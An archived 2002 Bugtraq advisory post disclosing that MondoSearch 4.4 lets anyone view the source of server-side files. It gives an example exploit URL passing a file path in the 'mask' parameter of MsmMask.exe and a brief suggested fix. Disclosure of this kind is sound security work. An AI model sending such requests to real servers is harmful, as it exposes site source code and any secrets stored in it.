[27382] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

MondoSearch show the source of all files

daemon@ATHENA.MIT.EDU (thefastkid)
Thu Oct 10 15:09:29 2002

Date: 10 Oct 2002 18:09:35 -0000
Message-ID: <20021010180935.14148.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: thefastkid <thefastkid@ziplip.com>
To: bugtraq@securityfocus.com



MondoSearch show the source of all files
--------------------------------------------

Affected Program: MondoSearch 4.4
(possibly earlier versions too, but not tested)
Vendor: http://www.mondosoft.com
Vendor Status: not informed yet
Discovery Date: 10 oct 2002

Problem
-------
You can see the source of the files, who are in the same
directory and subdirectories


Example
-------
http://www.foo/cgi-bin2/MsmMask.exe?mask=/
foo.asp ..to see the source of foo.asp in the root dir


Solutions
---------
* The program have to check if is real .cfg file


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[27382] in bugtraq

MondoSearch show the source of all files

daemon@ATHENA.MIT.EDU (thefastkid)Thu Oct 10 15:09:29 2002

daemon@ATHENA.MIT.EDU (thefastkid)
Thu Oct 10 15:09:29 2002